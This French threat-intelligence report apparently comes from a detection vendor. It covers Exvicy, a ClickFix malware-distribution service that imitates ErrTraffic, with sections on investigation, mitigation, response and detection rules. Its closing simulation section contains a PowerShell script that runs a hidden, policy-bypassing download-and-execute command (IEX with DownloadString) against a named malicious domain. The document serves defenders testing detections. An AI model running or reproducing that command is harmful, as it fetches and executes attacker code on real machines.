Exvicy : Un imitateur du cadre de distribution de malware ErrTraffic
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Exvicy est un cadre de distribution émergent Malware-as-a-Service (MaaS) ClickFix promu sur les forums de cybercriminalité. Il utilise l’ingénierie sociale en imitant les défis de Cloudflare Turnstile pour convaincre les utilisateurs d’exécuter des commandes PowerShell malveillantes via la boîte de dialogue Exécuter de Windows. Le cadre copie de près ErrTraffic, réutilisant de grandes portions de son code JavaScript et de ses techniques d’obfuscation.
Enquête
Les analystes TDR ont pivoté à partir d’une capture d’écran d’un panneau d’administration partagée sur le forum Exploit.IN pour découvrir une infrastructure C2 active. En analysant des serveurs de noms Cloudflare spécifiques et des modèles d’enregistrement de domaines, les chercheurs ont identifié plusieurs domaines malveillants et sites WordPress compromis. L’analyse technique a confirmé une réutilisation extensive du code ErrTraffic, y compris des fonctions JavaScript distinctives et une logique anti-analyse.
Atténuation
Les organisations devraient déployer un filtrage web robuste pour bloquer les domaines malveillants connus et les TLD suspects associés à ces campagnes. La protection des points de terminaison doit surveiller et restreindre l’exécution anormale de PowerShell, en particulier des commandes impliquant irm or iex. Les utilisateurs devraient également être formés à reconnaître les incitations d’ingénierie sociale leur demandant d’utiliser des raccourcis clavier tels que Win+R pour exécuter des commandes.
Réponse
Si une activité Exvicy est détectée, les hôtes affectés doivent être isolés immédiatement pour arrêter l’exécution de commandes supplémentaires ou la livraison de charges utiles. Les intervenants doivent examiner les journaux opérationnels de PowerShell pour identifier les commandes exécutées et les connexions réseau associées. Les adresses IP et domaines C2 connus doivent être bloqués à la périphérie, suivis d’un balayage pour d’autres ressources WordPress compromises dans l’environnement.
Flux d’attaque
Nous mettons encore à jour cette partie.
Détections
Command and Control suspect par demande DNS de domaine de premier niveau inhabituel (TLD) (via dns)
Entrée RunMRU suspecte avec sémantique LOLBin (via registry_event)
IOCs (SourceIP) à détecter : Exvicy : Un imitateur du cadre de distribution de logiciels malveillants ErrTraffic
IOCs (DestinationIP) à détecter : Exvicy : Un imitateur du cadre de distribution de logiciels malveillants ErrTraffic
Détection de l’exécution de commande PowerShell malveillante pour le logiciel malveillant Exvicy [Windows Powershell]
Execution de commandes du cadre Exvicy via le raccourci Win + R [Création de processus Windows]
Exécution de Simulation
-
Narration et commanditaires de l’attaque : Un adversaire livre un raccourci ou document malveillant à un utilisateur via le phishing. Lors de l’exécution (T1204.002), l’utilisateur déclenche à son insu un processus PowerShell (T1059.001). L’objectif de l’attaquant est de prendre pied en téléchargeant une charge utile secondaire. Pour imiter le cadre Exvicy, la ligne de commande est conçue pour inclure le domaine malveillant spécifique connu
recaptcha-check.com/8E9curHNH8UfAMLzpour télécharger l’agent malveillant. -
Script de Test de Régression :
# Script de simulation pour déclencher la règle de détection Exvicy. # Cela imite les modèles de ligne de commande identifiés dans la règle Sigma. $maliciousUrl = "http://recaptcha-check.com/8E9curHNH8UfAMLz" $command = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command `"IEX (New-Object Net.WebClient).DownloadString('$maliciousUrl')`"" Write-Host "[+] Démarrage de la Simulation : Exécution de la commande pour déclencher la détection..." Start-Process powershell.exe -ArgumentList "-ExecutionPolicy Bypass -Command `"$command`"" Write-Host "[+] Commande de simulation envoyée. Vérifiez les alertes SIEM." -
Commandes de Nettoyage :
# Nettoyage : Aucun fichier permanent n'est créé par cette simulation spécifique, # mais nous nous assurons qu'aucun processus PowerShell en suspens ne soit en cours d'exécution. Stop-Process -Name "powershell" -ErrorAction SilentlyContinue Write-Host "[+] Nettoyage terminé."